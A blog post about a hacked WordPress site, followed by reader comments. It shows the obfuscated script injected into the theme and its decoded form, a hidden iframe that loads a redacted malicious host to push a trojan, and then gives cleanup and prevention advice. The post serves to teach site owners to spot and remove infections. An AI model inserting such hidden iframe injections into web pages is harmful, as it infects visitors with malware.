WordPress is the most popular blogging platform in the world with over 6 Million downloads so far (See why I like wordpress here) and because its so popular, you know the bad guys will begin to target its users. Hacking is a very serious issue that can cripple any website and erase a hard earned source of income, especially for the unsuspecting. The thing about it is many of us have never witnessed the devastating effects that malicious scripts can have on a website, so I’m going to show you an example of what happens when hackers attack and how to deal with it.
Fortunately, I have never been hacked, so I will be showing an example from another person’s experience that I came across yesterday. Below is a screenshot of his wordpress dashboard 2 months after the malicious script was installed.
Hacked WordPress Screenshot
As you can see, everything’s all mixed up. When he tried to visit his blog through his web browser, his anti-virus software popped up with warnings that a trojan horse was found on the site and the site may be dangerous. This is when he realized that something had gone wrong; after the damage was already done.
The Malicious Code
He then decided to check his theme’s html files to find the source of the problem and here he found some code that he did not recognize because the malicious code was encrypted. Example below:
<script language=”javascript”>eval(unescape(“%64%6F%63%75%6D%65
The hackers obviously encrypted a part of the line of code hoping to hide the true nature and purpose of the script. When decoded the code reads as follows:
<script language=”javascript”>eval(unescape(“document.write(‘<iframe src=”http://xxxxxxxx.org/in.php” width=1 height=1 frameborder=0></iframe>’);”))</script>
The script was actually trying to call a malicious website to load on his website through a hidden frame. This website would automatically load a trojan horse virus in the his browser.
How Did The Script Get in the Html for his Blog?
The next question is; how did this malicious code get into his blog in the first place? Answer: A virus on his local windows PC stole his FTP login credentials from his FTP client and then used the FTP client to remotely infect the site, considering that he used his FTP to directly access his blog’s directories. Typically, the php files with execution permission within the directories were infected, especially the plugin and theme files are the first targets.
The Solution
Here are some steps to take to remove an infestation:
1) Ensure that you have a robust anti-virus software on your PC that is updated. Run a complete scan of your entire computer system and ensure that all viruses are removed. I would recommend downloading Malwarebytes’ Anti-Malware Software to compliment your anti-virus software. This works very well.
2) In this scenario, it was only the default wordpress php files that were affected, so a fresh copy of the files were uploaded after removing the malicious ones from the hosting server.
3) Change local FTP passwords and ensure that the new ones are very complex. This is very important to do because normally after a malicious attack there is always an open “backdoor” that remains and the hacker can easily exploit this.
4) To be on the safe side, change your hosting account’s password as well as your site’s database password, whether it is Postgre or MySQL.
PHP & HTML Knowledge
It is very important to know basic html and php because this will give you the benefit of recognizing suspicious activity and malicious code and I can’t stress this enough. A site such as Lynda.com provides amazing video tutorials that will definitely help you to grasp the basics and master programming languages if you’re seriously interested. They have helped me a lot.
Prevention is Better Than Cure
You may view a list of plugins and techniques that will help to prevent malicious attacks on one of my previous posts here: 10 Simple Steps to Secure & Protect your WordPress Blog
Some key points that are not in that post are:
1) Do not save your login credentials in your FTP client.
2) Change all passwords on a monthly basis
3) Be carefull when downloading free plugins. It is best to download them from wordpress.org.
4) Keep your anti-virus software updated
Please note that if your blog gets hacked, the symptoms and the causes may be different from what had happened in the scenario described above..
If your wordpress blog gets hacked, don’t panic. Use the following resources to recover your website:
Additional Resources if you Suspect That You May Be Hacked
1) Use Google Webmaster Tools to detect malicious scripts.
2) Post the details of symptoms to the WordPress Community, if you notice any suspicious activities happening in your blog
3) If you decide to clean it up yourself, there is a good list of steps to take, in an article at WordPress.org Codex.
Please note that if your blog or other type of site gets hacked, the symptoms and the causes may be different from what had happened in the scenario I presented.
I hope you found this post helpful and will take the steps to prevent the exploitation of your site / blog.
Discussion: Have you ever been hacked? Leave a comment and tell us of your experiences. If you would like to have a more in-depth discussion on this topic, feel free to contact me through here.
I will definitely look into this. I am currently fixing my other site, the main one… coz after reading this, I now am more convinced that it may have been hacked. Thanks for sharing this post!
Thanks for reading Lance and I’m glad you found it useful.
Its a very serious issue, so you could check to see if its a case where your site was hacked. Please let me know if you need any help with site.
Hi Sam,
Thanks for the infomation. My site isn’t up yet, but this will definetely help me to be aware, and proactive against hacks.
Thanks also for the link to Linda.com. I was looking into learning the basics, C++, and its nice to watch a video sometimes.
See you around.
Neil
I’m glad the information is helpful. Its really important to prepare for the unexpected. If you need any help just let me know.
Lynda.com is a great place to start. They offer video tutorials for everything and are very thorough.
Thanks for sharing this info. Saved to delicious for a rainy day.
Thanks for reading
Awesome info, thank you. It hasn’t happened yet, but you can’t be too careful.
.-= Dennis Edell @ Direct Sales Marketing´s last blog ..Holy Power Outage Batman, Not Again! Yep, Another Two Days Shot to Hell… =-.
Thanks for reading and commenting Dennis.
I shall return.
.-= Dennis Edell @ Direct Sales Marketing´s last blog ..Attention Readers of all Kinds! – Multiple Articles Comin’ Atcha!! =-.
i have just encountered your site. sweet design and everything. it is exactly like mine
.-= Ed´s last blog ..How To Browse Blocked Websites =-.
Thanks for reading Ed and I’m glad you like the design.
I visited your site and the topics are really very similar to mine. Maybe we can share ideas and exchange guest posts.
What do you think?
Your blog has been recommended to us as a interviewee’s favorite blog!
We would like to do an interview with you about your blog for Blog
Interviewer. We’d
like to give you the opportunity to
give us some insight on the “person behind the blog.”
It would just take a few minutes of your time. The interview form can
be submitted online here Submit your
interview.
Best regards,
Mike Thomas
Thanks for the great post bro! Still i haven’t been hacked… but, when looking at what is happening these days.. we need to take every precaution to safeguard ourselves! If they can hack Google… who are we?
Bookmarked your post mate! 
.-= Pubudu Kodikara´s last blog ..3 Cheers! Our Page Rank Has Been Updated! =-.
That’s right Pubudu,
If they can hack google that means that they could probably slaughter anyone else. The good thing is that we may not be such a hot target as google is.
Thanks for again for reading!
It’s also useful to actually backup your files daily. For all of my major (content-rich) websites that require WordPress to run efficiently, I install WP-Backup to email me daily backups of my database file.
While this won’t prevent my website from being hacked, if indeed it is hacked, I’ll have at least a week’s worth of backups to help me get started back on the right track.
.-= Flippa Chick´s last blog ..Photoshop Tutorial: How to Create Stunningly Simple Header Graphics in Under 10 Minutes =-.
That’s right Flippa Chick!
Having a backup is the safest and most reliable contingency plan if your site gets hacked. Its like a “get out of jail free card”
Thanks for reading.
No, I have never been hacked before. And, I’m somewhat offended by that. No one thought enough of my site to try and destroy it.
C’mon hackers. Show my site some love. J/K
.-= Chuck Edwards@Weight Loss Blog´s last blog ..The Special K Diet and Challenge =-.
Hey Chuck,
Be very careful what you wish for
If they can hack the US Gov”t websites, imagine what they can do to us.
I can guarantee you it happens, we just don’t here about it.
.-= Dennis Edell @ Direct Sales Marketing´s last blog ..What are YOUR Top 3 Social Sharing Recommendations =-.
Hey Sam,
Great post. I have to check this out! This is the first I have been here so I will be back for sure. Nice design too. Keep up the good work.
PJ
.-= PJ Bess´s last blog ..Forward To Basics | Everything Starts With a Plan – Part 2 =-.
Thanks for reading PJ!
Glad you like the design.